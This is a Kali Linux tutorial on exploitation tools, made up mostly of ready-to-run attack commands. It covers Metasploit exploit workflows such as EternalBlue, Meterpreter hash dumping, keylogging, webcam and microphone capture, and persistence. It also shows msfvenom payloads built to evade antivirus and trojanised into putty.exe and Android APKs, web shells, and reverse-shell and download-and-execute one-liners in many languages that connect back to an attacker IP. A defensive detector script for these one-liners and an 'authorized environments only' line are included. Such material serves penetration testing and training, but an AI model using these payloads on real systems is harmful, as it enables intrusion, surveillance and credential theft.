KALI LINUX SERIES

Kali Linux — Part 3

Exploitation Tools — Complete Guide

Metasploit Framework, Searchsploit, msfvenom, Netcat Reverse Shell, MSFconsole — a complete command reference for every tool needed for exploitation, with a detailed explanation of each command.

root@kali:~# msfconsole
=[ metasploit v6.x — exploitation framework ]
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
💥 Metasploit 🔎 Searchsploit 🧬 msfvenom 🐚 Meterpreter 📡 Reverse Shell 🛡️ Post Exploitation
📋 Table of Contents — Part 3
01 Searchsploit — Exploit Database
Search, copy, update exploits — all commands
02 Metasploit Framework — Complete Guide
MSFconsole navigation, search, use, options, run — all basic commands
Exploit, Payload, Auxiliary, Post modules — how to use them
Database setup, Workspace management, Import scan results
03 Meterpreter — Advanced Shell
All Meterpreter commands — File, System, Network, Pivoting
Privilege Escalation, Persistence, AV Evasion
04 msfvenom — Payload Generator
Create Windows, Linux, Android, Web payloads
Encoders, AV evasion, bind and reverse shells
05 Reverse Shells — All Types
Bash, Python, PHP, Netcat, PowerShell, Perl, Ruby reverse shells
Upgrade a shell, get a TTY shell
CHAPTER 01
🔎 Searchsploit — Exploit Database CLI
Offline copy of Exploit-DB — search and use exploits without internet access
searchsploit
Command line interface for Exploit-DB — search exploits locally by software name or CVE
Exploit Search Offline DB

🔍 Search Commands

Flag / Command | Function | Example
searchsploit [keyword] | Search exploits by keyword | searchsploit apache 2.4
searchsploit [soft] [ver] | Search by software name and version | searchsploit wordpress 5.8
-t keyword | Search in the title only (more precise results) | searchsploit -t "remote code execution"
--cve CVE-XXXX | Search by CVE number | searchsploit --cve CVE-2021-44228
-e keyword | Exact phrase match | searchsploit -e "Apache 2.4.49"
--exclude "word" | Exclude a keyword from the results | searchsploit apache --exclude "windows"
-w | Show Exploit-DB website URLs | searchsploit -w apache 2.4
-j | Output in JSON format | searchsploit -j apache | python3 -m json.tool
--nmap file.xml | Search exploits from an Nmap XML scan result | searchsploit --nmap scan.xml

📋 Exploit File Operations

Flag | Function | Example
-p EDB-ID | Show the full path of an exploit | searchsploit -p 42966
-m EDB-ID | Copy (mirror) an exploit to the current directory | searchsploit -m 42966
-x EDB-ID | Examine/read an exploit file directly | searchsploit -x 42966
--update | Update the exploit database | searchsploit --update
# Find all Apache exploits
root@kali:~# searchsploit apache 2.4
# Search for exploits directly from an Nmap scan result
root@kali:~# searchsploit --nmap nmap_scan.xml
# Find the Log4Shell exploit by CVE
root@kali:~# searchsploit --cve CVE-2021-44228
# Copy an exploit and view it
root@kali:~# searchsploit -m 42966
root@kali:~# cat 42966.py
# Find Linux (Samba) exploits, excluding Windows
root@kali:~# searchsploit samba --exclude "windows"
# Update the database
root@kali:~# searchsploit --update
CHAPTER 02
💥 Metasploit Framework — Complete Guide
The world's most popular penetration testing framework — from exploits to post-exploitation, all in one place
Metasploit Framework
Open-source exploit framework by Rapid7 — 2000+ exploits, 500+ payloads, 300+ auxiliary modules
Exploit Payload Post-Exploit AV Evasion

🚀 Launching MSFconsole & Basic Navigation

# Initialize the database (first time only)
root@kali:~# msfdb init
# Launch MSFconsole
root@kali:~# msfconsole
# Quiet mode (no banner)
root@kali:~# msfconsole -q
# Run a resource file (automation)
root@kali:~# msfconsole -r commands.rc

⌨️ MSFconsole — All Basic Commands

Command | Function | Example
help | Show all available commands | help
help [command] | Show help for a specific command | help search
search [keyword] | Search modules by name, CVE, author | search eternalblue
search type:exploit | Search only exploit modules | search type:exploit platform:windows
search cve:2021 | Search by CVE year | search cve:2021 type:exploit
use [module] | Select a module | use exploit/windows/smb/ms17_010_eternalblue
use [number] | Select a module by its search result number | use 0
info | Show detailed info about the current module | info
show options | Show the module's configurable options | show options
show advanced | Show advanced options | show advanced
show payloads | Show compatible payloads | show payloads
show targets | Show available exploit targets | show targets
set [OPTION] [value] | Set the value of an option | set RHOSTS 192.168.1.5
setg [OPTION] [value] | Set a global value (applies to all modules) | setg LHOST 192.168.1.100
unset [OPTION] | Clear an option's value | unset RHOSTS
run / exploit | Run the exploit | run
run -j | Run as a background job | run -j
check | Check whether the target is vulnerable (without exploiting) | check
back | Leave the current module | back
exit / quit | Exit Metasploit | exit
sessions | Show all active sessions | sessions
sessions -i [id] | Interact with a specific session | sessions -i 1
sessions -k [id] | Kill a specific session | sessions -k 1
sessions -l | List all sessions | sessions -l
jobs | Show background jobs | jobs
kill [job_id] | Kill a background job | kill 0
background / Ctrl+Z | Send the current session to the background | background
spool file.txt | Save console output to a file | spool /tmp/msf_log.txt
makerc file.rc | Save the session's commands to a resource file | makerc /tmp/commands.rc

🗄️ Database & Workspace Management

Command | Function
db_status | Show database connection status
workspace | Show the current workspace
workspace -a [name] | Create a new workspace
workspace [name] | Switch to a workspace
workspace -d [name] | Delete a workspace
db_nmap [options] target | Run Nmap and save the results to the database
db_import scan.xml | Import external scan results (Nmap XML)
hosts | Show hosts stored in the database
services | Show discovered services
vulns | Show known vulnerabilities
creds | Show collected credentials
loot | Show collected loot
db_export -f xml output.xml | Export the database

🎯 Module Types — What Each Does

💥 Exploit Module

Exploits a vulnerability to gain access to the target system.

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(...) > set RHOSTS 192.168.1.5
msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(...) > set LHOST 192.168.1.100
msf6 exploit(...) > run

🔧 Auxiliary Module

Scanning, fuzzing, sniffing, brute forcing — without exploiting.

msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(...) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(...) > set THREADS 50
msf6 auxiliary(...) > run

📦 Payload

Executes on the target after the exploit. Shell, Meterpreter, etc.

# Staged payload (small; fetches the rest of the stage from the handler over the network)
windows/x64/meterpreter/reverse_tcp
# Stageless payload (large, self-contained)
windows/x64/meterpreter_reverse_tcp

🔄 Post Module

Run after obtaining a session — privilege escalation, data collection.

msf6 > use post/multi/recon/local_exploit_suggester
msf6 post(...) > set SESSION 1
msf6 post(...) > run

🔥 Most Used Exploits

Module Path | CVE | Target | Description
exploit/windows/smb/ms17_010_eternalblue | CVE-2017-0144 | Windows 7/2008 | EternalBlue — NSA exploit, used in WannaCry
exploit/windows/smb/ms08_067_netapi | MS08-067 | Windows XP/2003 | Classic Windows SMB exploit
exploit/multi/handler | - | Any | Reverse shell listener (most used)
exploit/unix/ftp/vsftpd_234_backdoor | - | Linux | vsFTPd 2.3.4 backdoor
exploit/multi/samba/usermap_script | CVE-2007-2447 | Linux Samba | Samba usermap script injection
exploit/windows/http/rejetto_hfs_exec | CVE-2014-6287 | HFS Windows | HTTP File Server RCE
auxiliary/scanner/portscan/tcp | - | Any | TCP port scan with MSF
auxiliary/scanner/smb/smb_login | - | Windows | SMB login brute force
auxiliary/scanner/http/http_login | - | Web | HTTP form brute force
post/multi/recon/local_exploit_suggester | - | Any | Suggest local PrivEsc exploits
post/windows/gather/hashdump | - | Windows | Dump Windows password hashes
post/linux/gather/hashdump | - | Linux | Dump Linux /etc/shadow

🧩 Multi/Handler — Reverse Shell Listener

💡 What is Multi/Handler?
When you build a payload with msfvenom and execute it on the target, you need a listener in Metasploit to receive the connection. Multi/Handler is that listener.
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.100        # your IP
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > set ExitOnSession false        # to accept multiple connections
msf6 exploit(multi/handler) > run -j                         # run in the background
# After the target executes the payload you get a session
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] Sending stage (175174 bytes) to 192.168.1.5
[*] Meterpreter session 1 opened
# Enter the session
msf6 > sessions -i 1

🔍 Useful Auxiliary Modules

Module | Function
auxiliary/scanner/portscan/tcp | TCP port scan
auxiliary/scanner/smb/smb_version | Detect SMB version
auxiliary/scanner/smb/smb_login | Brute force SMB login
auxiliary/scanner/ssh/ssh_login | Brute force SSH login
auxiliary/scanner/ftp/ftp_login | Brute force FTP login
auxiliary/scanner/http/http_version | Detect web server version
auxiliary/scanner/http/dir_scanner | Scan web directories
auxiliary/scanner/vnc/vnc_login | Brute force VNC login
auxiliary/gather/dns_enum | DNS enumeration
auxiliary/sniffer/psnuffle | Sniff network traffic
CHAPTER 03
🐚 Meterpreter — Advanced Post-Exploitation Shell
The powerful shell obtained after exploitation — control the file system, network and system
Meterpreter
Metasploit's in-memory payload — writes no files to disk, so it is hard for AV to detect
Post-Exploit In-Memory Advanced Shell

💻 System Commands

Command | Function
sysinfo | Show system info (OS, hostname, arch)
getuid | Show the current user
getpid | Show the current process ID
ps | Show all running processes
migrate [PID] | Migrate to another process (stability/evasion)
kill [PID] | Kill a process
shell | Drop into a regular OS shell (cmd.exe or /bin/sh)
execute -f cmd -i | Execute a command in interactive mode
reboot | Reboot the target system
shutdown | Shut down the target system
idletime | Show how long the user has been idle
env | Show environment variables

📁 File System Commands

Command | Function
pwd | Show the current directory (on the target)
ls | List directory contents
cd [path] | Change directory
cat [file] | Show file content
download [file] | Download a file from the target
upload [file] [path] | Upload a file to the target
edit [file] | Edit a file on the target
rm [file] | Delete a file
mkdir [dir] | Create a directory
search -f *.txt | Search for files
search -f passwords.txt -d C:\\ | Search for a password file on the C drive
lpwd | Current directory on the attacker machine
lcd [path] | Change directory on the attacker machine

🌐 Network Commands

Command | Function
ipconfig / ifconfig | Show network interfaces and IPs
arp | Show the ARP table
route | Show the routing table
netstat | Show active network connections
portfwd add -l 8080 -p 80 -r target | Set up port forwarding (for pivoting)
portfwd list | List port forwarding rules
portfwd delete -l 8080 | Remove a port forwarding rule

⬆️ Privilege Escalation

Command | Function
getsystem | Attempt to gain SYSTEM privileges (Windows)
getprivs | Show current privileges
use post/multi/recon/local_exploit_suggester | Suggest local PrivEsc exploits
hashdump | Dump Windows password hashes (needs SYSTEM)
run post/windows/gather/hashdump | Dump hashes using the post module
load incognito | Load the token impersonation extension
list_tokens -u | Show available tokens (incognito)
impersonate_token "DOMAIN\\Admin" | Impersonate an admin token

📸 Surveillance Commands

Command | Function
screenshot | Take a screenshot of the target's screen
keyscan_start | Start the keylogger
keyscan_dump | Show logged keystrokes
keyscan_stop | Stop the keylogger
webcam_list | List available webcams
webcam_snap | Take a photo with the webcam
webcam_stream | View a live webcam stream
record_mic -d 10 | Record the microphone for 10 seconds

🔒 Persistence

Command | Function
run persistence -h | Show persistence module help
run persistence -S -U -X -i 30 -p 4444 -r LHOST | Auto-connect on startup/user login
run post/windows/manage/persistence_exe | Set up Windows persistence
run post/linux/manage/cron_persistence | Set up Linux cron persistence
# EternalBlue exploit — complete workflow
msf6 > search eternalblue
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.5
msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set LPORT 4444
msf6 exploit(ms17_010_eternalblue) > run
# Once you have a Meterpreter session:
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getsystem                  # get SYSTEM privileges
meterpreter > hashdump                   # dump password hashes
meterpreter > screenshot                 # capture the screen
meterpreter > download C:/secret.txt     # download a file
meterpreter > background                 # send the session to the background
# PrivEsc suggestions
msf6 > use post/multi/recon/local_exploit_suggester
msf6 post(...) > set SESSION 1
msf6 post(...) > run
CHAPTER 04
🧬 msfvenom — Payload Generator & Encoder
Create custom payloads for any platform — Windows, Linux, Android, Web
msfvenom
Metasploit payload generator and encoder — the old msfpayload + msfencode combined
Payload Gen AV Evasion Backdoor

⚙️ msfvenom — Core Flags

Flag | Function | Example
-p payload | Specify the payload | -p windows/x64/meterpreter/reverse_tcp
LHOST=IP | Set the attacker IP | LHOST=192.168.1.100
LPORT=port | Set the attacker listening port | LPORT=4444
-f format | Specify the output format | -f exe / -f elf / -f apk / -f raw
-o file | Set the output filename | -o payload.exe
-e encoder | Use an encoder (AV bypass) | -e x86/shikata_ga_nai
-i count | Increase the number of encoding iterations | -i 10
-b "\x00" | Avoid bad characters | -b "\x00\x0a\x0d"
-n bytes | Add a NOP sled | -n 10
-x template | Inject the payload into a legitimate exe | -x putty.exe
-k | Keep the template exe functional (with -x) | -k -x putty.exe
--list payloads | List all available payloads | msfvenom --list payloads
--list formats | List all output formats | msfvenom --list formats
--list encoders | List all encoders | msfvenom --list encoders

🪟 Windows Payloads

# Windows 64-bit Meterpreter Reverse TCP (.exe)
root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o win_payload.exe
# Windows 32-bit Meterpreter Reverse TCP
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload32.exe
# Encoded payload (AV bypass)
root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x64/xor_dynamic -i 10 -f exe -o encoded.exe
# Inject the payload into a legitimate exe
root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -k -x putty.exe -f exe -o trojan_putty.exe
# Windows PowerShell payload
root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f psh -o payload.ps1
# DLL payload (DLL hijacking)
root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f dll -o payload.dll
# Windows bind shell (opens a listening port on the target)
root@kali:~# msfvenom -p windows/x64/meterpreter/bind_tcp RHOST=192.168.1.5 LPORT=4444 -f exe -o bind_shell.exe
# ASP web shell (Windows IIS)
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f asp -o shell.asp
# ASPX web shell
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f aspx -o shell.aspx

🐧 Linux Payloads

# Linux 64-bit Meterpreter Reverse TCP (ELF)
root@kali:~# msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o linux_payload
root@kali:~# chmod +x linux_payload
# Linux 32-bit Meterpreter Reverse TCP
root@kali:~# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o linux32.elf
# Linux staged command shell (shell/reverse_tcp is a plain shell stage, not Meterpreter)
root@kali:~# msfvenom -p linux/x64/shell/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o shell.elf
# PHP web shell (Linux web server)
root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.php
# Python payload
root@kali:~# msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o payload.py
# Bash payload
root@kali:~# msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.100 LPORT=4444 -f raw -o payload.sh

📱 Android Payload

# Android APK payload
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -o android_payload.apk
# Inject into a legitimate APK
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -k -x original.apk -o trojan.apk
# Start the listener
root@kali:~# msfconsole -q -x "use exploit/multi/handler; set PAYLOAD android/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; run"

🌐 Web Payloads

# PHP Meterpreter web shell
root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw > shell.php
# JSP web shell (Java/Tomcat)
root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.jsp
# WAR file (Tomcat)
root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f war -o shell.war
# Node.js payload
root@kali:~# msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o payload.js

📊 Staged vs Stageless Payload

Type | Example | Description | When to Use
Staged | windows/x64/meterpreter/reverse_tcp | Small payload — downloads the rest from Metasploit | Normal network access
Stageless | windows/x64/meterpreter_reverse_tcp | Large self-contained payload — no download needed | Restricted network or AV evasion
CHAPTER 05
📡 Reverse Shells — All Types
Reverse shell one-liners in every language — Bash, Python, PHP, Netcat, PowerShell, Perl, Ruby
⚠️ How Does a Reverse Shell Work?
The target machine connects back to the attacker. On the attacker side a listener must be started first with nc -lvnp 4444.

👂 Listener Setup — Run First on the Attacker

# Netcat listener (simplest)
root@kali:~# nc -lvnp 4444
# Accept multiple connections
root@kali:~# nc -lkvnp 4444
# With rlwrap (arrow keys will work)
root@kali:~# rlwrap nc -lvnp 4444
# Metasploit multi/handler listener
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.100
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > run

🐚 Bash Reverse Shell

# Method 1 — Classic Bash
bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
# Method 2 — Bash with /dev/tcp on file descriptor 196
0<&196;exec 196<>/dev/tcp/192.168.1.100/4444; sh <&196 >&196 2>&196
# Method 3 — Background bash shell
bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1' &
# Method 4 — Encoded (filter bypass)
echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzQ0NDQgMD4mMQ==" | base64 -d | bash

🐍 Python Reverse Shell

# Python 3
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.100",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
# Python 2
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.100",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'
# Python short version
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("192.168.1.100",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'

🐘 PHP Reverse Shell

# PHP one-liner
php -r '$sock=fsockopen("192.168.1.100",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# PHP web shell (upload it)
<?php system($_GET['cmd']); ?>
# PHP reverse shell (upload as a file)
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'"); ?>
# PentestMonkey's full PHP reverse shell (recommended)
# Copy it from /usr/share/webshells/php/php-reverse-shell.php
root@kali:~# cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php
# Edit LHOST and LPORT, then upload

📡 Netcat Reverse Shell

# Traditional netcat (if -e is supported)
nc 192.168.1.100 4444 -e /bin/bash
# Modern netcat (OpenBSD) — no -e
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.100 4444 >/tmp/f
# Windows netcat
nc.exe 192.168.1.100 4444 -e cmd.exe
# ncat (Nmap's netcat)
ncat 192.168.1.100 4444 -e /bin/bash

🪟 PowerShell Reverse Shell (Windows)

# PowerShell one-liner
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "& {$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}"
# Encoded PowerShell (bypass restrictions)
powershell -EncodedCommand [BASE64_ENCODED_COMMAND]
# PowerShell download and execute
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.100/shell.ps1')"

🔢 Perl, Ruby, Awk, Lua Reverse Shells

# Perl
perl -e 'use Socket;$i="192.168.1.100";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# Ruby
ruby -rsocket -e'f=TCPSocket.open("192.168.1.100",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
# Awk
awk 'BEGIN {s = "/inet/tcp/0/192.168.1.100/4444"; while(42) { do{ printf "shell>" |& s; s |& getline c; print c; while ((c | getline line) > 0) print line | s; close(c)} while(c != "exit") close(s)}}'
# Lua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.1.100','4444');os.execute('/bin/sh -i <&3 >&3 2>&3');"
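An added defensive example, not part of this guide or of any tool it describes: a Python detector that flags the reverse-shell one-liner families from this chapter in recorded process command lines, decoding base64 and PowerShell -EncodedCommand blobs once and rescanning them. The log line format, the indicator names and the sample lines are constructed for the example.

```python
import base64
import re

# Indicator patterns for the reverse-shell one-liner families listed in this chapter.
# The indicator names are constructed for this example; map them to your own alert taxonomy.
INDICATORS = {
    "bash-dev-tcp":         re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
    "netcat-exec":          re.compile(r"\bn(?:c|cat)(?:\.exe)?\b[^|;&]*\s-e\s+\S"),
    "netcat-fifo":          re.compile(r"\bmkfifo\b.*\|\s*n(?:c|cat)\b"),
    "python-socket-dup2":   re.compile(r"socket\.socket\(.*os\.dup2\("),
    "pty-spawn":            re.compile(r"pty\.spawn\("),
    "php-fsockopen-exec":   re.compile(r"fsockopen\(.*\b(?:exec|system|popen|proc_open)\("),
    "perl-socket-exec":     re.compile(r"\bsocket\(S,PF_INET,SOCK_STREAM.*exec\("),
    "ruby-tcpsocket-exec":  re.compile(r"TCPSocket\.open\(.*\bexec\b"),
    "awk-inet-tcp":         re.compile(r"/inet/tcp/\d+/"),
    "lua-socket-exec":      re.compile(r"socket\.tcp\(\).*os\.execute\("),
    "powershell-tcpclient": re.compile(r"Net\.Sockets\.TCPClient\(.*GetStream\(\)", re.I),
    "powershell-encoded":   re.compile(r"(?:-enc|-EncodedCommand)\s+[A-Za-z0-9+/=]{16,}", re.I),
    "socat-pty-exec":       re.compile(r"\bsocat\b.*exec:.*pty.*tcp:", re.I),
    "base64-to-shell":      re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b"),
}

# Candidate base64 blobs worth decoding and rescanning (Bash Method 4 above, -EncodedCommand).
_B64 = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def _decode_blob(blob):
    """Base64-decode one candidate blob; return text, or None if it is not valid base64."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    # PowerShell -EncodedCommand is UTF-16LE: every odd byte of ASCII text is zero.
    if len(raw) >= 2 and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16-le", "ignore")
    return raw.decode("utf-8", "ignore")


def detect(cmdline, depth=0):
    """Return the sorted indicator names found in one command line.

    Base64 blobs are decoded once (depth 1) and rescanned, so the encoded Bash
    variant and a PowerShell -EncodedCommand payload are caught too; hits from
    decoded content are prefixed with "decoded:".
    """
    hits = {name for name, rx in INDICATORS.items() if rx.search(cmdline)}
    if depth == 0:
        for blob in _B64.findall(cmdline):
            decoded = _decode_blob(blob)
            if decoded:
                hits.update("decoded:" + h for h in detect(decoded, depth + 1))
    return sorted(hits)


# Simplified, constructed process-exec log format (not real auditd output).
_LOG_RX = re.compile(r"pid=(\d+)\s+uid=(\d+)\s+comm=(\S+)\s+cmd=(.*)$")


def scan_log(lines):
    """Return [(pid, comm, indicators)] for every log line that triggers at least one indicator."""
    findings = []
    for line in lines:
        m = _LOG_RX.match(line)
        if not m:
            continue
        hits = detect(m.group(4))
        if hits:
            findings.append((int(m.group(1)), m.group(3), hits))
    return findings


# Constructed sample log: the first four and the last line are one-liners from this chapter,
# the two in between are benign look-alikes that must not fire.
_PS_CMD = "$c=New-Object Net.Sockets.TCPClient('192.168.1.100',4444);$s=$c.GetStream()"
_PS_ENCODED = base64.b64encode(_PS_CMD.encode("utf-16-le")).decode("ascii")
SAMPLE_LOG = [
    "pid=4312 uid=33 comm=bash cmd=bash -i >& /dev/tcp/192.168.1.100/4444 0>&1",
    "pid=4313 uid=33 comm=python3 cmd=python3 -c 'import os,pty,socket;s=socket.socket();"
    's.connect(("192.168.1.100",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")\'',
    "pid=4314 uid=33 comm=sh cmd=rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.100 4444 >/tmp/f",
    'pid=4315 uid=33 comm=sh cmd=echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzQ0NDQgMD4mMQ==" | base64 -d | bash',
    "pid=4316 uid=1000 comm=nc cmd=nc -zv 192.168.1.5 80",
    "pid=4317 uid=1000 comm=python3 cmd=python3 manage.py runserver 0.0.0.0:8000",
    "pid=4318 uid=1001 comm=powershell.exe cmd=powershell -NoP -W Hidden -EncodedCommand " + _PS_ENCODED,
]

if __name__ == "__main__":
    for pid, comm, hits in scan_log(SAMPLE_LOG):
        print(f"pid={pid} comm={comm}: {', '.join(hits)}")
```

In practice, feed scan_log the command lines from your process-execution telemetry (auditd EXECVE records, Sysmon Event ID 1, EDR process events) instead of the constructed list.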

⬆️ Shell Upgrade — Dumb Shell → TTY Shell

Why Upgrade the Shell?
In a simple reverse shell, arrow keys don't work, Ctrl+C kills the shell, and sudo doesn't work. A TTY upgrade fixes all of these problems.
═══ Method 1: Python PTY (simplest) ═══
# Run on the target:
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Then press Ctrl+Z (send the shell to the background)
# On the attacker machine:
stty raw -echo; fg
# On the target:
export TERM=xterm
stty rows 38 columns 120
═══ Method 2: Use script ═══
script /dev/null -c bash
═══ Method 3: Socat (best) ═══
# Listener on the attacker:
socat file:`tty`,raw,echo=0 tcp-listen:4444
# On the target:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.100:4444
═══ Method 4: rlwrap (quick) ═══
# Before starting the listener:
root@kali:~# rlwrap nc -lvnp 4444

💥 Exploitation Checklist — Workflow

  • 1️⃣ Recon: Find all ports and services with Nmap → search for exploits with searchsploit
  • 2️⃣ Search: Find the Metasploit module with search in MSFconsole
  • 3️⃣ Configure: Set RHOSTS, PAYLOAD, LHOST, LPORT
  • 4️⃣ Run: Run check first, then run
  • 5️⃣ Shell: Once you have a reverse shell, upgrade it to a TTY
  • 6️⃣ PrivEsc: Run local_exploit_suggester
  • 7️⃣ Post: Hashdump, screenshot, data collection

💥 "Exploitation is not just about running tools — it's about understanding the target."

Practice everything in authorized environments only. Exploiting without permission is completely illegal.

Kali Linux Series — Part 3 | v1.0 | Exploitation Tools

Part 4: Password Attacks + Wireless (Hashcat, John, Hydra, Aircrack-ng) →